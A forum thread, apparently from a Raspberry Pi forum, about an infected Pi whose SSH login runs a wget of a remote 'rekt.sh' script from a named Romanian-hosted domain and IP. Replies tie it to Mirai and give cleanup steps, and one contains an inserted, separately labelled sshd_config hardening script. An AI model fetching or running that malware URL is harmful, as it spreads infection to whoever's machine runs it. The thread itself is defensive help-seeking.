wpmjones
Posts: 1
Joined: Sun May 14, 2017 3:07 pm

Is this a virus?

Sun May 14, 2017 3:24 pm

Yesterday, I noticed that my cron jobs weren't running. I opened crontab and found it to be blank. So I rebuilt it and figured it was a fluke. This morning, I couldn't SSH into it. So I rebooted and tried again. When I logged in, I experienced this.
Last login: Sun May 14 09:05:31 2017 from dal04631.hsd1.tx.comcast.net
converted 'http://kysfag.3x.ro//rekt.sh' (ANSI_X3.4-1968) -> 'http://kysfag.3x.ro//rekt.sh' (UTF-8)
--2017-05-14 10:03:50-- http://kysfag.3x.ro//rekt.sh
Resolving kysfag.3x.ro (kysfag.3x.ro)... 89.42.39.160
Connecting to kysfag.3x.ro (kysfag.3x.ro)|89.42.39.160|:80...
If I hit Ctrl-C during this process, it dumps me to a tmp$ prompt. I can cd and get back to my regular folder, and it seems everything is intact. If I let it finish, it boots me into what looks like a temp session without access to my regular files. I googled kysfag and rekt.sh and came up with nothing. I don't know how it happened, but it appears to be loading something when I log in through SSH (using PuTTY). Is there any way to go in and tell it to stop loading things when I log in? I'm just not all that versed in Linux.

Thanks in advance!

lolhof
Posts: 1
Joined: Sun May 14, 2017 5:30 pm

Re: Is this a virus?

Sun May 14, 2017 5:36 pm

Hi wpmJones,

I have the same problem as you, did you figure out a solution already?

thegnnu
Posts: 155
Joined: Thu Oct 18, 2012 7:07 pm
Location: Bristol

Re: Is this a virus?

Sun May 14, 2017 5:43 pm

Cannot help you with the virus, but start by going into your router and finding the place to block the IP 89.42.39.160; this should keep that site out.

jbudd
Posts: 294
Joined: Mon Dec 16, 2013 10:23 am

Re: Is this a virus?

Sun May 14, 2017 5:49 pm

According to scumware.org, the domain kysfag.3x.ro is associated with the Linux trojan Mirai.

http://thehackernews.com/2017/02/mirai- ... ndows.html

Ernst
Posts: 388
Joined: Sat Feb 04, 2017 9:39 am
Location: Germany

Re: Is this a virus?

Sun May 14, 2017 5:50 pm

This link gives some interesting information:
https://www.abuseipdb.com/check/89.42.39.160
where there are 3 reports with the subject keylogger.

mfa298
Posts: 972
Joined: Tue Apr 22, 2014 11:18 am

Re: Is this a virus?

Mon May 15, 2017 12:08 am

wpmjones wrote:Yesterday, I noticed that my cron jobs weren't running. I opened crontab and found it to be blank. So I rebuilt it and figured it was a fluke. This morning, I couldn't SSH into it. So I rebooted and tried again. When I logged in, I experienced this.
That certainly looks like a virus or other malware.

The easiest and safest course of action is to:
  • Turn off the pi
  • Disable any port forwarding on your router
  • Put an up to date image on a new SD card (assuming you want to recover data from the infected one)
  • Boot the clean image
  • Set a strong password for the Pi user (or better create a new user and delete the Pi user)
  • Install all updates (apt-get update, apt-get dist-upgrade)
  • Enable SSH if you need remote access
  • Enable port forwarding only if you need access externally (and consider not using port 22 for it)
  • Use an SD card reader to copy any data/scripts you need to keep (and check them before running)
You should potentially also consider anything else on the same network as compromised.

In most cases it's not worth the time trying to clean up an infected device. Without a lot of effort you won't know if you've found all the things someone might have modified or all the backdoors they might have installed.
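The SSH-related steps in the list above (new user instead of pi, no root login, non-22 port) come down to a handful of sshd_config directives. The script below is an added example, not the poster's or the Raspberry Pi project's code: it rewrites a config file into that shape and works on a constructed sample so it can be run offline. It goes one step beyond the post by also turning off PasswordAuthentication (key-only login), so copy your key in with ssh-copy-id first if you use it. On a real Pi you would run harden_sshd_config on a copy of /etc/ssh/sshd_config, check it with sudo sshd -t -f <copy>, then install it and restart the ssh service while keeping your current session open.

```shell
#!/bin/sh
# Added example: rewrite an sshd_config into the hardened shape the post
# recommends. Operates on whatever file it is given; the sample at the bottom
# is constructed and not a copy of any real system file.

# set_directive FILE KEY VALUE
# sshd honours the FIRST occurrence of a keyword, so a leftover "Port 22"
# above your new line would silently win. Every occurrence (including a
# commented-out default such as "#Port 22", or any comment that starts with
# the keyword) is therefore replaced by a single "KEY VALUE" line, which is
# appended if the keyword was absent. Caveat: the append goes at the end of
# the file; if your config has a "Match" block, move appended lines above it.
set_directive() {
    file=$1 key=$2 value=$3
    awk -v key="$key" -v value="$value" '
        BEGIN { done = 0 }
        {
            line = $0
            sub(/^[ \t]*#?[ \t]*/, "", line)   # strip leading "#" for comparison
            n = split(line, w, /[ \t]+/)
            if (n > 0 && tolower(w[1]) == tolower(key)) {
                if (!done) { print key " " value; done = 1 }
                next                           # drop duplicates
            }
            print
        }
        END { if (!done) print key " " value }
    ' "$file" > "$file.tmp" && mv "$file.tmp" "$file"
}

# directive FILE KEY: the effective value, i.e. the first uncommented occurrence
directive() {
    awk -v key="$2" '$1 !~ /^#/ && tolower($1) == tolower(key) { print $2; exit }' "$1"
}

# harden_sshd_config FILE USER PORT
harden_sshd_config() {
    cfg=$1 user=$2 port=$3
    set_directive "$cfg" Port "$port"               # not 22: cuts scanner noise, not a control by itself
    set_directive "$cfg" PermitRootLogin no
    set_directive "$cfg" AllowUsers "$user"         # only the new account; the pi user is gone
    set_directive "$cfg" PasswordAuthentication no  # key-only login (beyond what the post asks)
    set_directive "$cfg" MaxAuthTries 3
}

# Demo on a constructed sample of stock-looking defaults
sample=$(mktemp)
cat > "$sample" <<'EOF'
# constructed sample (not a copy of any real sshd_config)
#Port 22
#PermitRootLogin prohibit-password
PasswordAuthentication yes
#MaxAuthTries 6
Subsystem sftp /usr/lib/openssh/sftp-server
EOF
harden_sshd_config "$sample" alice 2222
cat "$sample"
rm -f "$sample"
```

Port forwarding on the router should still point only at the new port and only if remote access is genuinely needed; moving off 22 reduces log noise from mass scanners but does nothing against an attacker who already has a valid password, which is why the user change and key-only login carry the weight.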

runboy93
Posts: 302
Joined: Tue Feb 28, 2017 1:17 pm
Location: Finland

Re: Is this a virus?

Mon May 15, 2017 12:33 am

You forgot "apt-get upgrade" from install the updates :)

mfa298
Posts: 972
Joined: Tue Apr 22, 2014 11:18 am

Re: Is this a virus?

Mon May 15, 2017 12:43 am

runboy93 wrote:You forgot "apt-get upgrade" from install the updates :)
When using dist-upgrade running apt-get upgrade is a redundant step (dist-upgrade will do the same and sometimes a bit more)

update downloads the package metadata
upgrade will install newer versions of packages
dist-upgrade will install newer versions of packages and updated dependencies (i.e. if new packages are also required)

Most of the time the packages installed by upgrade and dist-upgrade will be the same, but there are occasional times where upgrade will hold a package back as the update needs a new package to be installed.

kusti8
Posts: 3441
Joined: Sat Dec 21, 2013 5:29 pm
Location: USA

Re: Is this a virus?

Mon May 15, 2017 12:44 am

runboy93 wrote:You forgot "apt-get upgrade" from install the updates :)
It is better to do dist-upgrade than upgrade. Upgrade keeps some packages back in special cases, while dist-upgrade upgrades everything so that all versions are the latest and stay consistent.
